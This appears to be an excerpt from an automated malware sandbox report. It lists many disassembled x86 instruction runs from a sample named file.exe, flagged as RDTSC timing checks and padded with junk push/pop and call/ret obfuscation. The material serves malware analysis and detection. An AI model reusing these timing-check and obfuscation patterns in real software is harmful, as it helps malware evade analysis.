              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F435E second address: 10F4385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FBA4947DCFEh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F4385 second address: 10F4433 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947B579h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a sub edi, 15D61BC6h 0x00000010 push dword ptr fs:[00000000h] 0x00000017 mov ebx, dword ptr [ebp+122D38ADh] 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 call 00007FBA4947B56Fh 0x00000029 mov bx, E554h 0x0000002d pop edi 0x0000002e mov eax, dword ptr [ebp+122D0FA9h] 0x00000034 push 00000000h 0x00000036 push ecx 0x00000037 call 00007FBA4947B568h 0x0000003c pop ecx 0x0000003d mov dword ptr [esp+04h], ecx 0x00000041 add dword ptr [esp+04h], 00000015h 0x00000049 inc ecx 0x0000004a push ecx 0x0000004b ret 0x0000004c pop ecx 0x0000004d ret 0x0000004e push FFFFFFFFh 0x00000050 push 00000000h 0x00000052 push ecx 0x00000053 call 00007FBA4947B568h 0x00000058 pop ecx 0x00000059 mov dword ptr [esp+04h], ecx 0x0000005d add dword ptr [esp+04h], 0000001Dh 0x00000065 inc ecx 0x00000066 push ecx 0x00000067 ret 0x00000068 pop ecx 0x00000069 ret 0x0000006a nop 0x0000006b jns 00007FBA4947B56Ch 0x00000071 push eax 0x00000072 je 00007FBA4947B589h 0x00000078 push eax 0x00000079 push edx 0x0000007a push eax 0x0000007b push edx 0x0000007c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F4433 second address: 10F4437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F83CA second address: 10F83D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F9349 second address: 10F9353 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBA4947DCECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F9353 second address: 10F93EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FBA4947B573h 0x0000000c nop 0x0000000d call 00007FBA4947B56Ch 0x00000012 pushad 0x00000013 movzx ecx, si 0x00000016 popad 0x00000017 pop ebx 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007FBA4947B568h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 00000016h 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 mov dword ptr [ebp+122D191Ch], eax 0x0000003a mov dword ptr [ebp+122D25CDh], edx 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push ebx 0x00000045 call 00007FBA4947B568h 0x0000004a pop ebx 0x0000004b mov dword ptr [esp+04h], ebx 0x0000004f add dword ptr [esp+04h], 0000001Bh 0x00000057 inc ebx 0x00000058 push ebx 0x00000059 ret 0x0000005a pop ebx 0x0000005b ret 0x0000005c sbb ebx, 01C9D202h 0x00000062 xchg eax, esi 0x00000063 jmp 00007FBA4947B56Eh 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b push ebx 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F93EC second address: 10F93F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FA471 second address: 10FA477 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FA477 second address: 10FA497 instructions: 0x00000000 rdtsc 0x00000002 je 00007FBA4947DCE8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FBA4947DCF0h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FA497 second address: 10FA504 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947B56Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a nop 0x0000000b sub dword ptr [ebp+122D18F7h], edx 0x00000011 push 00000000h 0x00000013 jmp 00007FBA4947B56Dh 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007FBA4947B568h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 0000001Ah 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 add dword ptr [ebp+12451BD5h], ecx 0x0000003a mov edi, dword ptr [ebp+122D3759h] 0x00000040 xchg eax, esi 0x00000041 jmp 00007FBA4947B570h 0x00000046 push eax 0x00000047 push eax 0x00000048 push edx 0x00000049 push ebx 0x0000004a push ecx 0x0000004b pop ecx 0x0000004c pop ebx 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FA504 second address: 10FA50A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FB5BC second address: 10FB618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop esi 0x00000008 nop 0x00000009 mov ebx, dword ptr [ebp+122D3879h] 0x0000000f mov bx, 6587h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007FBA4947B568h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 0000001Ch 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f mov edi, dword ptr [ebp+122D1AF2h] 0x00000035 mov di, 85C5h 0x00000039 mov ebx, 2895DCB0h 0x0000003e push 00000000h 0x00000040 mov dword ptr [ebp+122D1C14h], edi 0x00000046 add edi, 3D113CD1h 0x0000004c push eax 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 push ecx 0x00000051 pop ecx 0x00000052 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F54D1 second address: 10F54D7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FDAFC second address: 10FDB05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FDB05 second address: 10FDB09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F85A3 second address: 10F85BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA4947B577h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F95E0 second address: 10F95EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FBA4947DCE6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110207A second address: 110207E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FDC64 second address: 10FDC6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FDC6A second address: 10FDD15 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBA4947B576h 0x00000008 jmp 00007FBA4947B570h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007FBA4947B577h 0x00000015 nop 0x00000016 mov edi, dword ptr [ebp+122D1900h] 0x0000001c push dword ptr fs:[00000000h] 0x00000023 ja 00007FBA4947B56Bh 0x00000029 mov dword ptr fs:[00000000h], esp 0x00000030 jmp 00007FBA4947B577h 0x00000035 mov eax, dword ptr [ebp+122D170Dh] 0x0000003b push 00000000h 0x0000003d push edx 0x0000003e call 00007FBA4947B568h 0x00000043 pop edx 0x00000044 mov dword ptr [esp+04h], edx 0x00000048 add dword ptr [esp+04h], 0000001Ch 0x00000050 inc edx 0x00000051 push edx 0x00000052 ret 0x00000053 pop edx 0x00000054 ret 0x00000055 jnl 00007FBA4947B56Ch 0x0000005b cmc 0x0000005c push FFFFFFFFh 0x0000005e mov di, bx 0x00000061 push eax 0x00000062 push ebx 0x00000063 push eax 0x00000064 push edx 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FDD15 second address: 10FDD19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FDD19 second address: 10FDD1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1101347 second address: 110134C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110134C second address: 1101352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1103F55 second address: 1103F5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1105E02 second address: 1105E0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1105E0E second address: 1105E1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947DCEAh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1105E1D second address: 1105E3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBA4947B572h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1105E3A second address: 1105E46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FBA4947DCE6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1105E46 second address: 1105E4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11063E9 second address: 11063ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1106673 second address: 1106679 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110AA9C second address: 110AAAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA4947DCEEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110AAAE second address: 110AAB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110D17D second address: 110D195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edx 0x00000006 pop edx 0x00000007 pushad 0x00000008 popad 0x00000009 jl 00007FBA4947DCE6h 0x0000000f popad 0x00000010 jc 00007FBA4947DCECh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1110742 second address: 1110747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1110747 second address: 111076B instructions: 0x00000000 rdtsc 0x00000002 jg 00007FBA4947DCEEh 0x00000008 push edi 0x00000009 jmp 00007FBA4947DCF1h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110FFDD second address: 110FFE8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1115B46 second address: 1115B9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA4947DCF0h 0x00000009 popad 0x0000000a pop ebx 0x0000000b push eax 0x0000000c je 00007FBA4947DCF8h 0x00000012 push edi 0x00000013 jmp 00007FBA4947DCF0h 0x00000018 pop edi 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d jmp 00007FBA4947DCEDh 0x00000022 mov eax, dword ptr [eax] 0x00000024 jne 00007FBA4947DCEEh 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e push ebx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111A587 second address: 111A58D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111A58D second address: 111A59F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c je 00007FBA4947DCE6h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111A6D4 second address: 111A6DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111A6DA second address: 111A6DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111A9A8 second address: 111A9B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FBA4947B566h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111A9B6 second address: 111A9C0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBA4947DCE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111A9C0 second address: 111A9C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111A9C6 second address: 111A9D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jnl 00007FBA4947DCE6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111AB0B second address: 111AB26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FBA4947B56Eh 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111C3E7 second address: 111C410 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007FBA4947DCE6h 0x0000000d jmp 00007FBA4947DCF5h 0x00000012 jnc 00007FBA4947DCE6h 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111C410 second address: 111C41A instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBA4947B56Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A5ED8 second address: 10A5EFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA4947DCEFh 0x00000009 popad 0x0000000a jl 00007FBA4947DCE8h 0x00000010 push esi 0x00000011 pop esi 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A5EFB second address: 10A5EFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A5EFF second address: 10A5F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112017E second address: 1120190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FBA4947B566h 0x0000000a push eax 0x0000000b jnp 00007FBA4947B566h 0x00000011 pop eax 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1120190 second address: 1120195 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1120195 second address: 112019F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112019F second address: 11201A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11201A8 second address: 11201AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1120436 second address: 1120499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edi 0x00000006 jno 00007FBA4947DCE6h 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f push ecx 0x00000010 jmp 00007FBA4947DCECh 0x00000015 pushad 0x00000016 popad 0x00000017 pop ecx 0x00000018 popad 0x00000019 pushad 0x0000001a jmp 00007FBA4947DCF8h 0x0000001f jmp 00007FBA4947DCF6h 0x00000024 jmp 00007FBA4947DCEFh 0x00000029 pushad 0x0000002a pushad 0x0000002b popad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1120499 second address: 112049F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1120765 second address: 1120782 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBA4947DCEEh 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1120782 second address: 1120788 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1120909 second address: 1120970 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBA4947DCF9h 0x00000008 jmp 00007FBA4947DCF6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jnp 00007FBA4947DCF1h 0x00000016 jmp 00007FBA4947DCEBh 0x0000001b push ecx 0x0000001c jmp 00007FBA4947DCEFh 0x00000021 pop ecx 0x00000022 pushad 0x00000023 je 00007FBA4947DCE6h 0x00000029 jl 00007FBA4947DCE6h 0x0000002f pushad 0x00000030 popad 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1120ACA second address: 1120AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1120BFC second address: 1120C06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FBA4947DCE6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D1199 second address: 10D11AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947B56Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111FD24 second address: 111FD37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA4947DCEBh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111FD37 second address: 111FD42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11256DC second address: 11256E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11256E0 second address: 11256E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11256E6 second address: 1125701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBA4947DCF5h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1125701 second address: 112570B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FBA4947B566h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1125874 second address: 11258A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA4947DCF4h 0x00000009 pop ebx 0x0000000a jo 00007FBA4947DCECh 0x00000010 jnp 00007FBA4947DCE6h 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 jnp 00007FBA4947DCE6h 0x0000001f pop esi 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11258A3 second address: 11258AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnp 00007FBA4947B566h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1125CA7 second address: 1125CB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1125CB1 second address: 1125CB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1125CB5 second address: 1125CF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 je 00007FBA4947DCE6h 0x0000000d pop ecx 0x0000000e jno 00007FBA4947DCFFh 0x00000014 popad 0x00000015 jc 00007FBA4947DD2Dh 0x0000001b push eax 0x0000001c push edx 0x0000001d ja 00007FBA4947DCE6h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1125CF3 second address: 1125CF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1125CF7 second address: 1125CFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1125CFB second address: 1125D01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1126792 second address: 1126796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1126796 second address: 11267C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947B574h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBA4947B574h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F09CB second address: 10F09CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
